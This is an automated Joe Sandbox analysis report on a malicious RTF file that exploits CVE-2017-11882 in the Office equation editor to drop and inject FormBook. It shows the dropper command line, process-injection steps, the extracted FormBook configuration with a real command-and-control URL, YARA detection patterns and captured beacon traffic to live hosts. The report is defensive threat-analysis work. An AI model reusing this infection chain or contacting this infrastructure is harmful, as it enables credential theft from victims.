Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
Analysis ID:680332
MD5:26111b2647fc8b1e3e123e825f716b94
SHA1:131907f569a2774c1800430ccf052896dc685ec0
SHA256:7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
Tags:rtf
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Office process drops PE file
Writes to foreign memory regions
Document contains OLE streams with names of living off the land binaries
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Found suspicious RTF objects
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Office Equation Editor has been started
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2992 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 2948 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: D94161753531177B2FB80365ADDCBFA8)
        • notepad.exe (PID: 2496 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • NAPSTAT.EXE (PID: 204 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
              • firefox.exe (PID: 2420 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bookmarkfiles.info/aekc/"], "decoy": ["RMXvmWv1T8LnwQ==", "Eihj8MxKqewaukr9kA==", "+g6zzMM6GRqNBkX3uOBoqQ==", "pWRxiwc2Bfok7RT5", "vPwdzH5MqglB6x8BBR1yrw==", "MjC+3B4RiO87RDzpmA==", "38QEn2bgSsIbukr9kA==", "H/gg2eB11REpukr9kA==", "nR93HiGa/mm/l+rJcb0fzd3Ys9oH32E71g==", "1tdkeMK6HwpkdW9G/kFSNwwB2TiAJg==", "oxrGgFLiVZy7cJxgKmur4bIu", "1dZdfsq5k9TlwQ+5duE=", "b0J+ndKQ9h05o6NV8lOr4bIu", "fjfP53bwT8LnwQ==", "hTvn/If7T8LnwQ==", "FDzSk+QA0/1P", "9jlCyLJev/gnukr9kA==", "hRGrJJDDvPMQTa2POpTalloPghMa", "ioI1Oi/bWM0DVVpH/GXBQtDC3A==", "7Qq8yL5gzg702uLu", "9aS3x0Ry6dY4ZZ99S5PKQtDC3A==", "yMYCrLpn10a3R1E1AFOv6ack", "w8w/bvcWATu7PDDwfd0JuYgI0A==", "NTbg7NdXVle3N1Pu0CUw", "OQQbz5yH+jOxwQ+5duE=", "qTrBdXUWf8vwGBk=", "oi21Ou1SR37/pPq9U7m6Nz8E2TiAJg==", "l9PJcHotT8LnwQ==", "K/QPqqhuzMkB7PjYiKZAb3I=", "roGw5GmYgsUk7RT5", "gTxXZNw8T8LnwQ==", "5N+VzPa9HhZ0f3pRGniEeDcs3PI=", "CeIVuGevoMbvN5Fr/GCr4bIu", "hkZ+riVUPmvvfHcYBlWl36Yl1A==", "nOfvBG59bKkwzdeNIYPFQtDC3A==", "W57fbAhOOkGdGkIAo/NP/cqJ4vQ=", "E8tuxTQzaqZB", "ugwnTscE8fYk7RT5", "JrAINpN+XL0d4hLnlek=", "qESZmsanHEjMukr9kA==", "/v06r9lmzw==", "W/CcThAzaqZB", "xML0nKZguwUN8QY=", "5XIhrh0dlLk/oBZibInIQtDC3A==", "Z3C7ZmwGA/ok7RT5", "DRi50wcM+2wQsQLoicXEOQGAKNP232E71g==", "AF+XxB0kk4HhnuLXn/My8Ho=", "HGucKuFQc/pymOzcmA==", "voOmzEFjVr0JRm5E+l2r4bIu", "ddDg/GlYzfQZ5iHve6ZAb3I=", "XBxNffL72iGfJX1tbaKguA==", "MxhV44jVxD+PGPbYmA==", "0WeywuzZvww2iA/WfPY=", "1myvw0eaf6gklfODaZ4sYmw=", "SOOWE3prlNJZ", "MTC9xPPkUjxsT0kf1DN/SAx8OvRxRA6h", "0JyrUE8FaI8iJxvXdqZAb3I=", "Hd4mSndaPXTmig/WfPY=", "11PeMCuzsqHVJ0nu0CUw", "0iQvcErbTcQcukr9kA==", "LH+NhcKpDC1XGHbu0CUw", "gThzlciV/PsyEVPxn/Q67no=", "lIgXFAarBzy5uA+5duE=", "31gOPnVkSwUN8QY="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfMAL_RTF_Embedded_OLE_PEDetects a suspicious string often used in PE files in a hex encoded object streamFlorian Roth
  • 0x78b4:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465
  • 0x7818:$m1: 4d5a90000300000004000000ffff
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1269:$obj2: \objdata
  • 0x1df799:$obj2: \objdata
  • 0x2bfdaf:$obj3: \objupdate
  • 0x8de:$obj4: \objemb
  • 0x1dee0e:$obj4: \objemb

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
  • 0xea600:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0xea621:$font: 0A 01 08 5A 5A
  • 0xea652:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xea500:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xea629:$exe: .exe
  • 0xea63d:$exe: .exe
  • 0xea652:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18e29:$sqlite3step: 68 34 1C 7B E1
    • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
    • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
    • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
    • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 62 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.notepad.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.notepad.exe.400000.1.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        9.2.notepad.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.notepad.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18e29:$sqlite3step: 68 34 1C 7B E1
        • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
        • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
        • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
        • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C
        9.0.notepad.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 39 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfReversingLabs: Detection: 14%
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeReversingLabs: Detection: 21%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeJoe Sandbox ML: detected
          Source: 9.0.notepad.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bookmarkfiles.info/aekc/"], "decoy": ["RMXvmWv1T8LnwQ==", "Eihj8MxKqewaukr9kA==", "+g6zzMM6GRqNBkX3uOBoqQ==", "pWRxiwc2Bfok7RT5", "vPwdzH5MqglB6x8BBR1yrw==", "MjC+3B4RiO87RDzpmA==", "38QEn2bgSsIbukr9kA==", "H/gg2eB11REpukr9kA==", "nR93HiGa/mm/l+rJcb0fzd3Ys9oH32E71g==", "1tdkeMK6HwpkdW9G/kFSNwwB2TiAJg==", "oxrGgFLiVZy7cJxgKmur4bIu", "1dZdfsq5k9TlwQ+5duE=", "b0J+ndKQ9h05o6NV8lOr4bIu", "fjfP53bwT8LnwQ==", "hTvn/If7T8LnwQ==", "FDzSk+QA0/1P", "9jlCyLJev/gnukr9kA==", "hRGrJJDDvPMQTa2POpTalloPghMa", "ioI1Oi/bWM0DVVpH/GXBQtDC3A==", "7Qq8yL5gzg702uLu", "9aS3x0Ry6dY4ZZ99S5PKQtDC3A==", "yMYCrLpn10a3R1E1AFOv6ack", "w8w/bvcWATu7PDDwfd0JuYgI0A==", "NTbg7NdXVle3N1Pu0CUw", "OQQbz5yH+jOxwQ+5duE=", "qTrBdXUWf8vwGBk=", "oi21Ou1SR37/pPq9U7m6Nz8E2TiAJg==", "l9PJcHotT8LnwQ==", "K/QPqqhuzMkB7PjYiKZAb3I=", "roGw5GmYgsUk7RT5", "gTxXZNw8T8LnwQ==", "5N+VzPa9HhZ0f3pRGniEeDcs3PI=", "CeIVuGevoMbvN5Fr/GCr4bIu", "hkZ+riVUPmvvfHcYBlWl36Yl1A==", "nOfvBG59bKkwzdeNIYPFQtDC3A==", "W57fbAhOOkGdGkIAo/NP/cqJ4vQ=", "E8tuxTQzaqZB", "ugwnTscE8fYk7RT5", "JrAINpN+XL0d4hLnlek=", "qESZmsanHEjMukr9kA==", "/v06r9lmzw==", "W/CcThAzaqZB", "xML0nKZguwUN8QY=", "5XIhrh0dlLk/oBZibInIQtDC3A==", "Z3C7ZmwGA/ok7RT5", "DRi50wcM+2wQsQLoicXEOQGAKNP232E71g==", "AF+XxB0kk4HhnuLXn/My8Ho=", "HGucKuFQc/pymOzcmA==", "voOmzEFjVr0JRm5E+l2r4bIu", "ddDg/GlYzfQZ5iHve6ZAb3I=", "XBxNffL72iGfJX1tbaKguA==", "MxhV44jVxD+PGPbYmA==", "0WeywuzZvww2iA/WfPY=", "1myvw0eaf6gklfODaZ4sYmw=", "SOOWE3prlNJZ", "MTC9xPPkUjxsT0kf1DN/SAx8OvRxRA6h", "0JyrUE8FaI8iJxvXdqZAb3I=", "Hd4mSndaPXTmig/WfPY=", "11PeMCuzsqHVJ0nu0CUw", "0iQvcErbTcQcukr9kA==", "LH+NhcKpDC1XGHbu0CUw", "gThzlciV/PsyEVPxn/Q67no=", "lIgXFAarBzy5uA+5duE=", "31gOPnVkSwUN8QY="]}

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Found potential equation exploit (CVE-2017-11882)
          Source: Static RTF information: Object: 1 Offset: 001DF7BDh
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drStream path '_1721465588/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: notepad.pdb source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: napstat.pdb source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Document exploit detected (drops PE files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: Client.exe.0.drJump to dropped file
          Document exploit detected (creates forbidden files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to behavior
          Source: global trafficDNS query: name: www.magadirect.co.uk
          Source: global trafficDNS query: name: www.sqlite.org
          Source: global trafficDNS query: name: www.luanaterra.online
          Source: global trafficDNS query: name: www.hogogala.com
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.magadirect.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.18.44 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.bookmarkfiles.info/aekc/
          Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
          Source: global trafficHTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1Host: www.magadirect.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.33.18.44 45.33.18.44
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 08 Aug 2022 10:08:49 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Mon, 08 Aug 2022 10:09:09 GMTContent-type: text/html; charset=utf-8Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 39 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 31 34 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 30 38 30 37 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
